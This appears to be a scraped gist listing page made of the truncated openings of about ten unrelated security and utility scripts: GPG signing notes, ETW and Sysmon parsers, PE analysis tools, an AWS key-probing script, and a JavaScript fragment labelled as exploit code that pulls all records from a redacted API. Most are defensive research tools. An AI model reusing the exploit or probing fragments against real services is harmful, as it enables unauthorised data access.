This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# How to sign your custom RPM package with GPG key | |
# Step: 1 | |
# Generate gpg key pair (public key and private key) | |
# | |
# You will be prompted with a series of questions about encryption. | |
# Simply select the default values presented. You will also be asked | |
# to create a Real Name, Email Address and Comment (comment optional). | |
# | |
# If you get the following response: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//Exploit Code by Shawar Khan | |
var data_chunks = ''; | |
// Capturing Records from API | |
fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) { | |
// Holds the records in as String | |
var allrecords = data; | |
// converting response to JSON |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
logman start trace dotNetAssemblyTrace2 -p "Microsoft-Windows-DotNETRuntimeRundown" "LoaderRundownKeyword, StartRundownKeyword" win:Informational -o dotNetAssemblyTrace2.etl -ets | |
Start-Sleep -Seconds 5 | |
logman stop dotNetAssemblyTrace2 -ets | |
$EnumeratedCLRRuntimes = Get-WinEvent -Path .\dotNetAssemblyTrace2.etl -Oldest -FilterXPath '*[System[(EventID=187)]]' | |
$EnumeratedAppDomains = Get-WinEvent -Path .\dotNetAssemblyTrace2.etl -Oldest -FilterXPath '*[System[(EventID=157)]]' | |
$EnumeratedAssemblies = Get-WinEvent -Path .\dotNetAssemblyTrace2.etl -Oldest -FilterXPath '*[System[(EventID=155)]]' | |
$EnumeratedModules = Get-WinEvent -Path .\dotNetAssemblyTrace2.etl -Oldest -FilterXPath '*[System[(EventID=153)]]' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.EnterpriseServices; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Carbon Black Evil PowerShell LSASS Query | |
# | |
# Prints out malicious Powershell events that have a crossproc event for c:\windows\system32\lsass.exe | |
# | |
# Author: Jason Lang (@curi0usJack) | |
# | |
# Prereqs (Windows 10) | |
# Install bash on Win10 | |
# sudo apt-get install python-pip | |
# sudo pip install --upgrade requests |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package djb2 | |
// For when you ever need to implement a dictionary hash function, | |
// that's good enough, simple and fast. | |
// | |
// WARNING: | |
// Not cryptographicly secure! | |
// | |
// Source: https://en.wikipedia.org/wiki/DJB2 | |
// |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
filter Get-PEFeature { | |
<# | |
.SYNOPSIS | |
Retrieves key features from PE files that can be used to build detections. | |
.DESCRIPTION | |
Get-PEFeature extracts key features of PE files that are relevant to building detections. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os | |
import sys | |
import logging | |
import pefile | |
import ucutils | |
import unicorn | |
import capstone | |
import argparse |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Written by Frans Rosén (twitter.com/fransrosen) | |
_debug="$2" #turn on debug | |
_timeout="20" | |
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key | |
_aws_key="AKIA..." | |
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3" | |
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Author: Matthew Graeber (@mattifestation) | |
$Epoch = Get-Date '01/01/1970' | |
# Conversion trick taken from https://blogs.technet.microsoft.com/heyscriptingguy/2017/02/01/powertip-convert-from-utc-to-my-local-time-zone/ | |
$StrCurrentTimeZone = (Get-WmiObject Win32_timezone).StandardName | |
$TZ = [TimeZoneInfo]::FindSystemTimeZoneById($StrCurrentTimeZone) | |
# Parse out all the LogonGUID fields for sysmon ProcessCreate events | |
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } | ForEach-Object { |